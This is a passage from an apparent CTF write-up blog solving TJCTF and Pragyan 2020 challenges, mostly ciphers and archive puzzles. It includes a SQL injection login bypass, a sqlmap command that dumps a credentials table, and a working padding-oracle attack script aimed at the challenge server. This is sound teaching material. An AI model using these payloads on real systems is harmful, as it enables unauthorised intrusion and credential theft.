            <span class="k">if</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">(</span><span class="n">flag</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span> <span class="o">==</span> <span class="n">target</span><span class="p">:</span>
                <span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
                <span class="c1"># A plain 'break' here only leaves the inner loop and keeps reading,</span>
                <span class="c1"># so exit outright on the first match</span>
                <span class="k">raise</span> <span class="ne">SystemExit</span>
</code></pre></div>
<p>Run the script and wait for the flag:</p>
<div class="highlight"><pre><span></span><code>╰─ python titanic_mdf5.py
tjctf<span class="o">{</span>end<span class="o">}</span>
</code></pre></div>
<h2>TJCTF2020 - Typewriter</h2>
<p><em>Published 2020-06-02 by nlegall - <a href="/tjctf2020-typewriter.html">/tjctf2020-typewriter.html</a></em></p>
<p><em>solves : 395</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by jpes707
Oh no! I thought I typed down the correct flag for this problem on my typewriter, but it came out all jumbled on the paper. Someone must have switched the inner hammers around! According to the paper, the flag is zpezy{ktr_gkqfut_hxkhst_tyukokkgotyt_hoftqhhst_ykxoz_qxilrtxiyf}.
Hint: a becomes q, b becomes w, c becomes e, f becomes y, j becomes p, t becomes z, and z becomes m. Do you see the pattern?
</code></pre></div>
<p>With the hint, the solution is quite obvious: we need to map each character back through the QWERTY keyboard layout.</p>
<div class="highlight"><pre><span></span><code><span class="n">flag</span> <span class="o">=</span> <span class="s2">"zpezy{ktr_gkqfut_hxkhst_tyukokkgotyt_hoftqhhst_ykxoz_qxilrtxiyf}"</span>
<span class="c1"># Key that was struck -> character the swapped hammer printed</span>
<span class="n">layout</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s1">'a'</span><span class="p">:</span> <span class="s1">'q'</span><span class="p">,</span>
    <span class="s1">'b'</span><span class="p">:</span> <span class="s1">'w'</span><span class="p">,</span>
    <span class="s1">'c'</span><span class="p">:</span> <span class="s1">'e'</span><span class="p">,</span>
    <span class="s1">'d'</span><span class="p">:</span> <span class="s1">'r'</span><span class="p">,</span>
    <span class="s1">'e'</span><span class="p">:</span> <span class="s1">'t'</span><span class="p">,</span>
    <span class="s1">'f'</span><span class="p">:</span> <span class="s1">'y'</span><span class="p">,</span>
    <span class="s1">'g'</span><span class="p">:</span> <span class="s1">'u'</span><span class="p">,</span>
    <span class="s1">'h'</span><span class="p">:</span> <span class="s1">'i'</span><span class="p">,</span>
    <span class="s1">'i'</span><span class="p">:</span> <span class="s1">'o'</span><span class="p">,</span>
    <span class="s1">'j'</span><span class="p">:</span> <span class="s1">'p'</span><span class="p">,</span>
    <span class="s1">'k'</span><span class="p">:</span> <span class="s1">'a'</span><span class="p">,</span>
    <span class="s1">'l'</span><span class="p">:</span> <span class="s1">'s'</span><span class="p">,</span>
    <span class="s1">'m'</span><span class="p">:</span> <span class="s1">'d'</span><span class="p">,</span>
    <span class="s1">'n'</span><span class="p">:</span> <span class="s1">'f'</span><span class="p">,</span>
    <span class="s1">'o'</span><span class="p">:</span> <span class="s1">'g'</span><span class="p">,</span>
    <span class="s1">'p'</span><span class="p">:</span> <span class="s1">'h'</span><span class="p">,</span>
    <span class="s1">'q'</span><span class="p">:</span> <span class="s1">'j'</span><span class="p">,</span>
    <span class="s1">'r'</span><span class="p">:</span> <span class="s1">'k'</span><span class="p">,</span>
    <span class="s1">'s'</span><span class="p">:</span> <span class="s1">'l'</span><span class="p">,</span>
    <span class="s1">'t'</span><span class="p">:</span> <span class="s1">'z'</span><span class="p">,</span>
    <span class="s1">'u'</span><span class="p">:</span> <span class="s1">'x'</span><span class="p">,</span>
    <span class="s1">'v'</span><span class="p">:</span> <span class="s1">'c'</span><span class="p">,</span>
    <span class="s1">'w'</span><span class="p">:</span> <span class="s1">'v'</span><span class="p">,</span>
    <span class="s1">'x'</span><span class="p">:</span> <span class="s1">'b'</span><span class="p">,</span>
    <span class="s1">'y'</span><span class="p">:</span> <span class="s1">'n'</span><span class="p">,</span>
    <span class="s1">'z'</span><span class="p">:</span> <span class="s1">'m'</span><span class="p">,</span>
    <span class="s1">'_'</span><span class="p">:</span> <span class="s1">'_'</span><span class="p">,</span>
    <span class="s1">'{'</span><span class="p">:</span> <span class="s1">'{'</span><span class="p">,</span>
    <span class="s1">'}'</span><span class="p">:</span> <span class="s1">'}'</span>
<span class="p">}</span>
<span class="c1"># Invert the table once so each printed character maps straight back to its key</span>
<span class="n">inverse</span> <span class="o">=</span> <span class="p">{</span><span class="n">printed</span><span class="p">:</span> <span class="n">key</span> <span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">printed</span> <span class="ow">in</span> <span class="n">layout</span><span class="o">.</span><span class="n">items</span><span class="p">()}</span>
<span class="n">result</span> <span class="o">=</span> <span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">inverse</span><span class="p">[</span><span class="n">c</span><span class="p">]</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">flag</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
</code></pre></div>
<p>Run it and get some points!</p>
<div class="highlight"><pre><span></span><code>╰─ python typewriter.py
tjctf<span class="o">{</span>red_orange_purple_efgrirroiefe_pineapple_fruit_auhsdeuhfn<span class="o">}</span>
</code></pre></div>
<h2>TJCTF2020 - Weak Password</h2>
<p><em>Published 2020-06-02 by nlegall - <a href="/tjctf2020-weak-password.html">/tjctf2020-weak-password.html</a></em></p>
<p><em>solves : 204</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by saisree
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})
</code></pre></div>
<p>We have a standard login page with two fields, <code>username</code> and <code>password</code>. We need to recover the admin password, which is the flag.</p>
<p><img alt="Weak_password_login.jpeg" src="https://blog.nlegall.fr/images/tjctf/2020/Weak_password_login.jpeg"></p>
<p>Let's try a standard SQLi payload: <code>' or 1=1--</code>.</p>
<p><img alt="Weak_password_login_2.jpeg" src="https://blog.nlegall.fr/images/tjctf/2020/Weak_password_login_2.jpeg"></p>
<p>We are logged in, so the login form is vulnerable to SQL injection. This time I used sqlmap to dump the table and get the password:</p>
<div class="highlight"><pre><span></span><code>sqlmap https://weak_password.tjctf.org/login --method<span class="o">=</span>POST --data <span class="s2">"username=admin&password=admin"</span> -p <span class="s2">"password"</span> --not-string<span class="o">=</span><span class="s2">"Wrong"</span> --user-agent <span class="s2">"Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0"</span> --tamper<span class="o">=</span>space2comment --level <span class="m">5</span> --risk <span class="m">3</span> --tables --dump -T userandpassword
Database: SQLite_masterdb
Table: userandpassword
<span class="o">[</span><span class="m">6</span> entries<span class="o">]</span>
+----+-----------------------+---------------------+
<span class="p">|</span> id <span class="p">|</span> password <span class="p">|</span> username <span class="p">|</span>
+----+-----------------------+---------------------+
<span class="p">|</span> <span class="m">1</span> <span class="p">|</span> blindsqli14519 <span class="p">|</span> admin <span class="p">|</span>
<span class="p">|</span> <span class="m">2</span> <span class="p">|</span> random_passwd <span class="p">|</span> random_user <span class="p">|</span>
<span class="p">|</span> <span class="m">3</span> <span class="p">|</span> evenmorerandom_passwd <span class="p">|</span> evenmorerandom_user <span class="p">|</span>
<span class="p">|</span> <span class="m">4</span> <span class="p">|</span> blindsqli14519 <span class="p">|</span> admin <span class="p">|</span>
<span class="p">|</span> <span class="m">5</span> <span class="p">|</span> random_passwd <span class="p">|</span> random_user <span class="p">|</span>
<span class="p">|</span> <span class="m">6</span> <span class="p">|</span> evenmorerandom_passwd <span class="p">|</span> evenmorerandom_user <span class="p">|</span>
+----+-----------------------+---------------------+
</code></pre></div>
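<p>Why the payload works and what the fix looks like, as an added example that is not part of the original write-up: a constructed in-memory SQLite table with the same columns as the dump above (placeholder password, not the real one), a login query built by string concatenation beside its parameterised form, and the two responses that sqlmap told apart with <code>--not-string</code>.</p>

```python
import sqlite3

# Constructed stand-in for the challenge table: same columns as the dump,
# but a placeholder password rather than the real one
ROWS = [
    (1, "placeholder_pw", "admin"),
    (2, "random_passwd", "random_user"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userandpassword (id INTEGER, password TEXT, username TEXT)")
    db.executemany("INSERT INTO userandpassword VALUES (?, ?, ?)", ROWS)
    return db


def login_vulnerable(db, username, password):
    """Query built by concatenation: the quote in ' or 1=1-- closes the string
    literal early, 'or 1=1' runs as SQL, and -- comments out the trailing quote."""
    query = ("SELECT id FROM userandpassword WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    """Parameterised query: the driver binds the payload as a value, so it is
    only ever compared against the stored password, never parsed as SQL."""
    query = "SELECT id FROM userandpassword WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def page_text(logged_in):
    """The visible difference sqlmap keyed on with --not-string="Wrong"."""
    return "Welcome" if logged_in else "Wrong"


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("concatenated query:", page_text(login_vulnerable(db, "admin", payload)))
    print("parameterised query:", page_text(login_safe(db, "admin", payload)))
```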
<p>We got the flag: <code>tjctf{blindsqli14519}</code>.</p>
<h2>TJCTF2020 - Zipped Up</h2>
<p><em>Published 2020-06-02 by nlegall - <a href="/tjctf2020-zipped-up.html">/tjctf2020-zipped-up.html</a></em></p>
<p><em>solves : 255</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by agcdragon
My friend changed the password of his Minecraft account that I was using so that I would stop being so addicted. Now he wants me to work for the password and sent me this zip file. I tried unzipping the folder, but it just led to another zipped file. Can you find me the password so I can play Minecraft again?
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/663d7cda5bde67bd38a8de1f07fb9fab9dd8dd0b75607bb459c899acb0ace980_0.zip">Zip file</a></p>
<p>The zip archive contains another archive, and inside that one sits a text file alongside the next archive:</p>
<div class="highlight"><pre><span></span><code>╰─ tar -jtvf <span class="m">1</span>.tar.bz2
drwxr-xr-x andy/andy <span class="m">0</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:58 <span class="m">1</span>/
-rw-r--r-- andy/andy <span class="m">1022589</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:58 <span class="m">1</span>/2.tar.bz2
-rw-r--r-- andy/andy <span class="m">20</span> <span class="m">2020</span>-03-09 <span class="m">02</span>:57 <span class="m">1</span>/1.txt
╰─ cat <span class="m">1</span>.txt
tjctf<span class="o">{</span>n0t_th3_fl4g<span class="o">}</span>
</code></pre></div>
<p>So we need to extract every archive in turn and check whether its text file contains the flag. I wrote a Python script that calls 7z to extract them:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">subprocess</span>
<span class="c1"># Each layer may use a different container format, so try every extension with 7z</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1000</span><span class="p">):</span>
    <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar.bz2"</span><span class="p">])</span>
    <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".kz3"</span><span class="p">])</span>
    <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar.gz"</span><span class="p">])</span>
    <span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">([</span><span class="s2">"7z"</span><span class="p">,</span> <span class="s2">"e"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="s2">".tar"</span><span class="p">])</span>
</code></pre></div>
<p>That extracts the first 1000 layers. Let's check whether one of the text files contains something other than the decoy flag:</p>
<div class="highlight"><pre><span></span><code>╰─ rg -v <span class="s1">'n0t_th3'</span> *.txt
<span class="m">829</span>.txt
<span class="m">1</span>:tjctf<span class="o">{</span>p3sky_z1p_f1L35<span class="o">}</span>
</code></pre></div>
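<p>The same two steps (peel every layer, then look for a flag that is not the decoy) as one added script rather than the author's: it identifies each layer by its magic bytes instead of guessing extensions, caps how far any single layer may inflate, and the nested sample it unpacks is constructed in memory, not the challenge file.</p>

```python
import bz2
import gzip
import io
import re
import tarfile
import zipfile
import zlib

FLAG_RE = re.compile(rb"tjctf\{[^}]*\}")
DECOY = b"n0t_th3_fl4g"          # every layer carries this fake flag
MAX_DEPTH = 2000                 # the real file needed 829 layers; still cap it
MAX_LAYER = 50 * 1024 * 1024     # never inflate a single layer past 50 MiB


def sniff(data):
    """Name the container from its magic bytes; the extension is not trusted."""
    if data.startswith(b"BZh"):
        return "bz2"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if len(data) > 262 and data[257:262] == b"ustar":
        return "tar"
    return None


def _inflate(decomp, data):
    # Bounded decompression: a small layer that wants to grow past the cap is a bomb
    out = decomp.decompress(data, MAX_LAYER)
    if not decomp.eof:
        raise ValueError("layer inflates past the size cap")
    return out


def unwrap(data):
    """Return [(name, bytes)] one level down, or [] if `data` is a plain file."""
    kind = sniff(data)
    if kind == "bz2":
        return [("bz2-stream", _inflate(bz2.BZ2Decompressor(), data))]
    if kind == "gzip":
        return [("gzip-stream", _inflate(zlib.decompressobj(16 + zlib.MAX_WBITS), data))]
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = [i for i in zf.infolist() if not i.is_dir()]
            if any(i.file_size > MAX_LAYER for i in members):
                raise ValueError("zip member past the size cap")
            return [(i.filename, zf.read(i)) for i in members]
    if kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
            members = [m for m in tf.getmembers() if m.isfile()]
            if any(m.size > MAX_LAYER for m in members):
                raise ValueError("tar member past the size cap")
            return [(m.name, tf.extractfile(m).read()) for m in members]
    return []


def find_flag(blob):
    """Peel layers breadth-first until a plain file holds a flag other than the decoy."""
    queue = [(blob, 0)]
    while queue:
        data, depth = queue.pop(0)
        if depth > MAX_DEPTH:
            raise RuntimeError("nesting deeper than MAX_DEPTH")
        children = unwrap(data)
        if not children:                       # leaf: a plain file
            found = FLAG_RE.search(data)
            if found and DECOY not in found.group(0):
                return found.group(0).decode()
            continue
        queue.extend((child, depth + 1) for _, child in children)
    return None


def _add(tf, name, payload):
    info = tarfile.TarInfo(name)
    info.size = len(payload)
    tf.addfile(info, io.BytesIO(payload))


def build_sample():
    """Constructed three-layer stand-in mirroring the listing above (not the real archive)."""
    inner = io.BytesIO()
    with tarfile.open(fileobj=inner, mode="w") as tf:
        _add(tf, "2/2.txt", b"tjctf{c0nstructed_s4mple}\n")
    layer2 = gzip.compress(inner.getvalue())              # plays 2.tar.gz
    outer = io.BytesIO()
    with tarfile.open(fileobj=outer, mode="w") as tf:
        _add(tf, "1/1.txt", b"tjctf{n0t_th3_fl4g}\n")
        _add(tf, "1/2.tar.gz", layer2)
    layer1 = bz2.compress(outer.getvalue())               # plays 1.tar.bz2
    zipped = io.BytesIO()
    with zipfile.ZipFile(zipped, "w") as zf:
        zf.writestr("1.tar.bz2", layer1)                  # plays the downloaded .zip
    return zipped.getvalue()


if __name__ == "__main__":
    print(find_flag(build_sample()))
```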
<p>Great! It was inside the 829th archive.</p>
<h2>Pragyan 2020 - ASCII Sentence</h2>
<p><em>Published 2020-02-26 by nlegall - <a href="/pragyan-2020-ascii-sentence.html">/pragyan-2020-ascii-sentence.html</a></em></p>
<p><em>solves : 123</em></p>
<div class="highlight"><pre><span></span><code>Decode this
8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161
</code></pre></div>
<p>Since these are ASCII codes written back to back, we need to cut the digit string into the right values before decoding: printable codes are two digits, except those from 100 upward, which are three digits and always start with 1.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="n">decode</span> <span class="o">=</span> <span class="s2">"8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161"</span>
<span class="n">asci</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">x</span> <span class="o">=</span> <span class="mi">0</span>
<span class="c1"># A code starting with 1 is three digits (100-126); every other printable code is two</span>
<span class="k">while</span> <span class="n">x</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">decode</span><span class="p">):</span>
    <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">asci</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">2</span><span class="p">])))</span>
        <span class="n">i</span> <span class="o">=</span> <span class="mi">3</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">asci</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">+</span> <span class="n">decode</span><span class="p">[</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">])))</span>
        <span class="n">i</span> <span class="o">=</span> <span class="mi">2</span>
    <span class="n">x</span> <span class="o">+=</span> <span class="n">i</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">asci</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"base64 decode: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">asci</span><span class="p">))))</span>
</code></pre></div>
<p>Let's run the script and get the decoded string:</p>
<div class="highlight"><pre><span></span><code>$ python ascii.py
<span class="nv">Y3t1cnRfYXNsa29fZV9mb2FfZWVlX25nZHlwdHlfZWh3a3RpX29ifQ</span><span class="o">==</span>
base64 decode: b<span class="s1">'c{urt_aslko_e_foa_eee_ngdypty_ehwkti_ob}'</span>
</code></pre></div>
<p>OK, we got some clear text, but shuffled. After looking at Rail Fence and trying every ROT shift, we split the string into three parts:</p>
<div class="highlight"><pre><span></span><code>pty_ehwkti_ob}
_foa_eee_ngdy
c{urt_aslko_e
</code></pre></div>
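<p>The whole chain in one place, as an added example rather than the author's script: splitting the run-together ASCII codes, the base64 decode, and the column read over the three rows just shown. The <code>rows</code> parameter generalises the three-way split, and the digit string is copied from the challenge text above.</p>

```python
import base64

# Copied from the challenge text
DIGITS = "8951116499911082102898878115975057102908657109985070102908786108885053110907210811910072108102908710451975182112885057105102816161"


def split_ascii_codes(digits):
    """Cut a run of decimal ASCII codes that has no separators.

    Printable ASCII is 32..126: two-digit codes start with 3..9 and every
    three-digit code starts with 1, so the first digit fixes the width.
    Codes outside the printable range are rejected rather than guessed at.
    """
    chars = []
    pos = 0
    while pos < len(digits):
        width = 3 if digits[pos] == "1" else 2
        if pos + width > len(digits):
            raise ValueError(f"truncated code at offset {pos}")
        code = int(digits[pos:pos + width])
        if not 32 <= code <= 126:
            raise ValueError(f"code {code} at offset {pos} is not printable ASCII")
        chars.append(chr(code))
        pos += width
    return "".join(chars)


def read_by_columns(text, rows=3):
    """Undo the transposition: the plaintext was written column by column into
    `rows` rows, and the rows were then concatenated bottom to top. When the
    length does not divide evenly, the top rows are the longer ones."""
    base, extra = divmod(len(text), rows)
    lengths = [base + (1 if r < extra else 0) for r in range(rows)]
    chunks = []
    pos = 0
    for length in reversed(lengths):     # the ciphertext holds the last row first
        chunks.append(text[pos:pos + length])
        pos += length
    grid = chunks[::-1]                  # grid[0] is the top row again
    return "".join(grid[i % rows][i // rows] for i in range(len(text)))


def solve(digits=DIGITS):
    b64 = split_ascii_codes(digits)
    shuffled = base64.b64decode(b64).decode()
    return read_by_columns(shuffled, rows=3)


if __name__ == "__main__":
    print(solve())
```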
<p>If you read it column by column, you get the flag: <code>p_ctf{you_are_the_weakest_link_good_bye}</code>.</p>
<h2>Pragyan 2020 - AskTheOracle</h2>
<p><em>Published 2020-02-26 by nlegall - <a href="/pragyan-2020-asktheoracle.html">/pragyan-2020-asktheoracle.html</a></em></p>
<div class="highlight"><pre><span></span><code>AskTheOracle (150pts)
Mr Robot has worked all night to find the Cipher "TIe8CkeWpqPFBmFcIqZG0JoGqBIWZ9dHbDqqfdx2hPlqHvwH/+tbAXDSyzyrn1Wf" then he faints of Overdose.You are left with a challenge to get the key to the database before EVIL CORP starts backing up the data.
nc ctf.pragyan.org 8500
P.S- After solving you will get a flag in the format of pctf{code}, change it to p_ctf{code} and submit it.
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ nc ctf.pragyan.org <span class="m">8500</span>
Enter in format <span class="s1">'<Ciphertext>|<Initialisation Vector>'</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">pwn</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64encode</span><span class="p">,</span> <span class="n">b64decode</span>
<span class="n">pwn</span><span class="o">.</span><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">logging</span><span class="o">.</span><span class="n">ERROR</span>
<span class="n">cipher</span> <span class="o">=</span> <span class="s2">"TIe8CkeWpqPFBmFcIqZG0JoGqBIWZ9dHbDqqfdx2hPlqHvwH/+tbAXDSyzyrn1Wf"</span>
<span class="n">cipherb</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">cipher</span><span class="p">)</span>
<span class="n">iv</span> <span class="o">=</span> <span class="s2">"VGhpcyBpcyBhbiBJVjQ1Ng=="</span>
<span class="n">ivb</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span>
<span class="n">allb</span> <span class="o">=</span> <span class="n">ivb</span> <span class="o">+</span> <span class="n">cipherb</span>
<span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">cipher</span><span class="p">,</span> <span class="n">iv</span><span class="p">):</span>
    <span class="c1"># oracle query: submit a (ciphertext, IV) pair and report whether the</span>
    <span class="c1"># server answers with 'Cipher Error!', the reply this attack keys on</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">remote</span><span class="p">(</span><span class="s1">'ctf.pragyan.org'</span><span class="p">,</span> <span class="mi">8500</span><span class="p">)</span>
    <span class="n">conn</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s1">'Enter in format </span><span class="se">\'</span><span class="s1"><Ciphertext>|<Initialisation Vector></span><span class="se">\'\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">conn</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="sa">f</span><span class="s1">'</span><span class="si">{</span><span class="n">cipher</span><span class="si">}</span><span class="s1">|</span><span class="si">{</span><span class="n">iv</span><span class="si">}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span>
    <span class="n">conn</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s1">'VGhpcyBpcyBhbiBJVjQ1Ng==</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
    <span class="n">res</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">()</span>
    <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">return</span> <span class="sa">b</span><span class="s1">'Cipher Error!</span><span class="se">\n</span><span class="s1">'</span> <span class="ow">in</span> <span class="n">res</span>
<span class="n">plain</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">block</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">allb</span><span class="p">),</span> <span class="mi">16</span><span class="p">,</span> <span class="o">-</span><span class="mi">16</span><span class="p">):</span>
    <span class="n">pad</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="c1"># c2: the block being recovered; c1: the forged block sent as its predecessor</span>
    <span class="n">c2</span> <span class="o">=</span> <span class="n">b64encode</span><span class="p">(</span><span class="nb">bytearray</span><span class="p">(</span><span class="n">allb</span><span class="p">[</span><span class="n">block</span> <span class="o">-</span> <span class="mi">16</span><span class="p">:</span><span class="n">block</span><span class="p">]))</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">17</span><span class="p">):</span>
        <span class="c1"># c1b: the real predecessor byte at this position (IV for the first block)</span>
        <span class="n">c1b</span> <span class="o">=</span> <span class="n">allb</span><span class="p">[</span><span class="n">block</span> <span class="o">-</span> <span class="mi">16</span> <span class="o">-</span> <span class="n">byte</span><span class="p">]</span>
        <span class="n">c1</span> <span class="o">=</span> <span class="p">(</span><span class="mi">16</span> <span class="o">-</span> <span class="n">byte</span><span class="p">)</span> <span class="o">*</span> <span class="p">[</span><span class="mh">0xf0</span><span class="p">]</span> <span class="o">+</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="p">[</span><span class="n">p</span> <span class="o">^</span> <span class="n">byte</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">pad</span><span class="p">]</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">256</span><span class="p">):</span>
            <span class="c1"># skip guesses that would give a non-ASCII plaintext byte</span>
            <span class="k">if</span> <span class="n">c1b</span> <span class="o">^</span> <span class="p">(</span><span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">)</span> <span class="o">></span> <span class="mi">126</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="n">c1</span><span class="p">[</span><span class="o">-</span><span class="n">byte</span><span class="p">]</span> <span class="o">=</span> <span class="n">i</span>
            <span class="k">if</span> <span class="n">send</span><span class="p">(</span><span class="n">c2</span><span class="p">,</span> <span class="n">b64encode</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">c1</span><span class="p">))</span><span class="o">.</span><span class="n">decode</span><span class="p">()):</span>
                <span class="n">pad</span><span class="o">.</span><span class="n">insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">)</span>
                <span class="n">plain</span><span class="o">.</span><span class="n">insert</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">c1b</span> <span class="o">^</span> <span class="p">(</span><span class="n">i</span> <span class="o">^</span> <span class="n">byte</span><span class="p">))</span>
                <span class="k">break</span>
<span class="nb">print</span><span class="p">(</span><span class="n">plain</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="nb">chr</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">plain</span><span class="p">]))</span>
</code></pre></div>
<p><em><a href="/pragyan-2020-encuentralo-si-puedes.html">Pragyan 2020 - Encuéntralo si puedes</a></em> (nlegall, 2020-02-26)</p>
<div class="highlight"><pre><span></span><code>Encuéntralo si puedes (350pts)
Solved by: 12%
Luis is very fond of music. Recently he developed a keen interest in CTF challenges. He makes a challenge for yankee and asks him if he could break it and find the code from it. Help yankee to find the secret code.
The flag format - p_ctf{OBTAINED_SECRET_CODE}
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ ffprobe despacito_luisFonsi.mp3
<span class="o">[</span>...<span class="o">]</span>
Input <span class="c1">#0, mp3, from 'despacito_luisFonsi.mp3':</span>
Metadata:
track : <span class="m">01</span>
Software : Lavf58.33.100
artist : Luis Fonsi ft. Daddy Yankee
genre : POP
Unknown text information frame: <span class="m">2017</span>
title : Despacito
comment : Better go last than first
album : Despacito
date : <span class="m">2017</span>
Duration: <span class="m">00</span>:05:21.43, start: <span class="m">0</span>.023021, bitrate: <span class="m">166</span> kb/s
Stream <span class="c1">#0:0: Audio: mp3, 48000 Hz, stereo, fltp, 166 kb/s</span>
Metadata:
encoder : LAME3.100
</code></pre></div>
